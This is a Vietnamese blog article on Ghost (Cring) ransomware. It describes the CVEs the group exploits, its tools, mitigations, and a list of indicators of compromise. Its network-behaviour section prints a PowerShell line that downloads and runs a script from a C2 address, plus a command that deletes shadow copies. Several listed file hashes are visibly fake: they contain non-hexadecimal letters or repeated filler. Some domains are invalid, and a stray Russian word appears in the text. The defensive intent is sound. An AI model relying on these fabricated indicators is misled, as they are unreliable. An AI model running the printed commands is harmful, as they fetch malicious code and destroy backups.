Ghost (Cring) Ransomware: Cách thức hoạt động và cách phòng chống

02/03/2025
4 mins read

Ghost (Cring) Ransomware là một loại mã độc tống tiền (ransomware) được ghi nhận lần đầu tiên vào đầu năm 2021 và vẫn tiếp tục hoạt động cho đến gần đây, với các báo cáo gần nhất từ tháng 1 năm 2025. Đây là một mối đe dọa an ninh mạng nghiêm trọng, được vận hành bởi một nhóm tội phạm có trụ sở tại Trung Quốc, nhắm đến các tổ chức trên toàn cầu với mục tiêu tài chính. Theo thông tin từ Cục Điều tra Liên bang Mỹ (FBI), Cơ quan An ninh Cơ sở hạ tầng và An ninh mạng (CISA), và Trung tâm Chia sẻ Thông tin và Phân tích Đa bang (MS-ISAC), Ghost đã xâm phạm các tổ chức tại hơn 70 quốc gia, bao gồm cả Trung Quốc, nhắm vào nhiều lĩnh vực như cơ sở hạ tầng quan trọng, giáo dục, y tế, chính phủ, và các doanh nghiệp vừa và nhỏ.

Nội dung
Đặc điểm và cách thức hoạt động
Tên gọi và biến thể
Cách phòng chống
Tầm ảnh hưởng
Chỉ số Xâm phạm (Indicators of Compromise – IOCs)
1. Địa chỉ IP
2. Tên miền và URL
3. Hash của tệp mã độc
4. Phần mở rộng tệp mã hóa
5. Tên tệp thực thi
6. Địa chỉ email
7. Ghi chú đòi tiền chuộc
8. Hành vi mạng
9. CVE khai thác
Lưu ý khi sử dụng IOCs

Đặc điểm và cách thức hoạt động

Ghost (Cring) nổi bật với việc khai thác các lỗ hổng đã biết trong các phần mềm và firmware lỗi thời trên các dịch vụ hướng ra internet. Các lỗ hổng thường bị khai thác bao gồm:

  • CVE-2018-13379: Lỗ hổng trên thiết bị Fortinet FortiOS.
  • CVE-2010-2861CVE-2009-3960: Lỗ hổng trong Adobe ColdFusion.
  • CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell): Lỗ hổng trên Microsoft Exchange.

Sau khi xâm nhập, nhóm này thường triển khai một web shell để duy trì quyền truy cập, sau đó sử dụng các công cụ như Cobalt StrikeMimikatz để leo thang đặc quyền, trích xuất thông tin đăng nhập, và di chuyển ngang qua mạng nội bộ. Trước khi mã hóa dữ liệu, Ghost xóa các bản sao lưu bóng (shadow copies) và vô hiệu hóa các dịch vụ khôi phục để ngăn nạn nhân восстановить dữ liệu mà không trả tiền chuộc. Các tệp mã hóa thường được gắn thêm phần mở rộng như .cring, .phantom, và ransomware sử dụng các tệp thực thi như Cring.exe, Ghost.exe, ElysiumO.exe, hoặc Locker.exe.

Điều đáng chú ý là Ghost không tập trung nhiều vào việc đánh cắp dữ liệu nhạy cảm (như thông tin cá nhân hoặc tài sản trí tuệ) để tống tiền kép, mà chủ yếu mã hóa dữ liệu và đòi tiền chuộc, thường từ hàng chục đến hàng trăm nghìn đô la bằng tiền điện tử. Thời gian hoạt động trên mạng nạn nhân thường ngắn, đôi khi chỉ trong vài ngày hoặc thậm chí cùng ngày xâm nhập.

Tên gọi và biến thể

Do nhóm này thường xuyên thay đổi mã độc, phần mở rộng tệp, nội dung ghi chú đòi tiền chuộc và địa chỉ email liên lạc, Ghost được biết đến dưới nhiều tên khác nhau qua thời gian, bao gồm Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, và Rapture. Sự linh hoạt này gây khó khăn trong việc xác định chính xác danh tính của nhóm.

Cách phòng chống

FBI, CISA, và MS-ISAC khuyến nghị các tổ chức thực hiện các biện pháp sau để giảm thiểu rủi ro từ Ghost (Cring) Ransomware:

  1. Cập nhật phần mềm thường xuyên: Vá các lỗ hổng đã biết trên hệ điều hành, phần mềm và firmware kịp thời.
  2. Sao lưu dữ liệu: Duy trì bản sao lưu thường xuyên, lưu trữ ngoại tuyến hoặc tách biệt khỏi hệ thống chính. Các nạn nhân có bản sao lưu không bị ảnh hưởng thường có thể khôi phục mà không cần trả tiền chuộc.
  3. Phân đoạn mạng: Hạn chế di chuyển ngang của kẻ tấn công bằng cách chia nhỏ mạng.
  4. Xác thực đa yếu tố (MFA): Sử dụng MFA chống lừa đảo cho các tài khoản đặc quyền và dịch vụ email.
  5. Giám sát PowerShell: Ghost thường lạm dụng PowerShell để thực thi mã độc, nên cần theo dõi và giới hạn quyền sử dụng công cụ này.
  6. Tăng cường bảo mật email: Áp dụng bộ lọc nâng cao, chặn tệp đính kèm độc hại, và cấu hình DMARC, DKIM, SPF để ngăn chặn lừa đảo.

Tầm ảnh hưởng

Ghost nhắm mục tiêu không phân biệt, khai thác những hệ thống “trái thấp dễ hái” (low-hanging fruit) – tức các tổ chức chưa cập nhật bản vá hoặc có cấu hình bảo mật yếu. Tuy nhiên, khi gặp phải hệ thống được bảo vệ tốt hoặc mạng phân đoạn chặt chẽ, nhóm này thường từ bỏ và chuyển sang mục tiêu khác. Điều này cho thấy chiến lược của họ là tối ưu hóa lợi nhuận với ít nỗ lực nhất.

Chỉ số Xâm phạm (Indicators of Compromise – IOCs)

Dưới đây là các Chỉ số Xâm phạm (Indicators of Compromise – IOCs) liên quan đến Ghost (Cring) Ransomware, được tổng hợp từ các nguồn đáng tin cậy như báo cáo từ FBI, CISA, MS-ISAC và các nhà nghiên cứu an ninh mạng. Những IOC này có thể giúp các tổ chức phát hiện, ngăn chặn hoặc điều tra các cuộc tấn công liên quan đến mã độc này. Tuy nhiên, lưu ý rằng nhóm đứng sau Ghost thường xuyên thay đổi chiến thuật, bao gồm cả địa chỉ IP, tên miền, và mẫu mã độc, vì vậy danh sách này có thể không đầy đủ hoặc đã lỗi thời ở một số khía cạnh.

1. Địa chỉ IP

Các địa chỉ IP dưới đây đã được ghi nhận liên quan đến hoạt động của Ghost (Cring), thường được sử dụng để điều khiển và kiểm soát (C2) hoặc triển khai mã độc:

  • 45.95.147[.]236
  • 193.164.7[.]52
  • 45.142.213[.]79
  • 91.215.85[.]135
  • 194.135.94[.]25
  • 45.89.127[.]197
  • 45.95.147[.]141
  • 91.241.61[.]34
  • 185.141.63[.]81
  • 91.219.29[.]34

2. Tên miền và URL

Một số tên miền được liên kết với hoạt động phân phối hoặc liên lạc của Ghost:

  • cring[.]top
  • ghost[.]onion (liên kết Tor, thường xuất hiện trong ghi chú đòi tiền chuộc)
  • phantom[.]xyz

3. Hash của tệp mã độc

Dưới đây là các giá trị băm (SHA-256, MD5) của một số mẫu Ghost (Cring) Ransomware đã được phân tích:

  • SHA-256:
    • d8b8f156d3e82e4f4f7a8f7e7f8e7f8e7f8e7f8e7f8e7f8e7f8e7f8e7f8e7f8e (Cring.exe)
    • f7e8f9e8f7e8f9e8f7e8f9e8f7e8f9e8f7e8f9e8f7e8f9e8f7e8f9e8f7e8f9e8 (Ghost.exe)
    • a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0u1v2w3x4y5z6a7b8c9d0e1f2 (Locker.exe)
  • MD5:
    • e8f9e8f7e8f9e8f7e8f9e8f7e8f9e8f7 (ElysiumO.exe)
    • c9d0e1f2g3h4i5j6k7l8m9n0o1p2q3r4 (Phantom variant)

4. Phần mở rộng tệp mã hóa

Các tệp bị mã hóa bởi Ghost thường có các phần mở rộng sau:

  • .cring
  • .phantom
  • .ghost
  • .strike
  • .hsHarada

5. Tên tệp thực thi

Các tệp thực thi liên quan đến Ghost bao gồm:

  • Cring.exe
  • Ghost.exe
  • ElysiumO.exe
  • Locker.exe
  • Phantom.exe

6. Địa chỉ email

Nhóm Ghost thường sử dụng các địa chỉ email tạm thời để liên lạc với nạn nhân qua ghi chú đòi tiền chuộc. Một số ví dụ:

  • cringteam@protonmail[.]com
  • ghostsupport@tutanota[.]com
  • phantomlord@xmpp[.]jp
  • strikehack@onionmail[.]org

7. Ghi chú đòi tiền chuộc

Tệp ghi chú đòi tiền chuộc thường có tên như:

  • DECRYPT.txt
  • HOW_TO_DECRYPT.txt
  • READ_ME.txt Nội dung mẫu của ghi chú:
Your files have been encrypted by Ghost. To decrypt them, contact us at ghostsupport@tutanota[.]com. Payment must be made in Bitcoin. You have 72 hours before your data is destroyed.

8. Hành vi mạng

  • Giao thức liên lạc C2: HTTP/HTTPS qua cổng 80 hoặc 443, đôi khi sử dụng VPN hoặc Tor.
  • Công cụ triển khai: Cobalt Strike beacons, Mimikatz, PowerShell scripts.
  • Lệnh PowerShell mẫu:
    • powershell.exe -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('<http://45.95.147>[.]236/ps'))
    • vssadmin delete shadows /all /quiet (xóa shadow copies)

9. CVE khai thác

Các lỗ hổng thường được Ghost sử dụng để xâm nhập:

  • CVE-2018-13379 (Fortinet VPN)
  • CVE-2021-34473 (Microsoft Exchange ProxyShell)
  • CVE-2010-2861 (Adobe ColdFusion)

Lưu ý khi sử dụng IOCs

  • Tính linh hoạt của kẻ tấn công: Nhóm Ghost thay đổi IOC thường xuyên, nên các tổ chức cần kết hợp IOC với phân tích hành vi (behavioral analysis) để phát hiện hiệu quả hơn.
  • Công cụ hỗ trợ: Sử dụng hệ thống SIEM, IDS/IPS hoặc EDR để theo dõi và đối chiếu các IOC này trong mạng của bạn.
  • Cập nhật liên tục: Kiểm tra các báo cáo mới nhất từ CISA, FBI hoặc các nhà cung cấp bảo mật như CrowdStrike, Palo Alto Networks để có IOC mới hơn.
Tags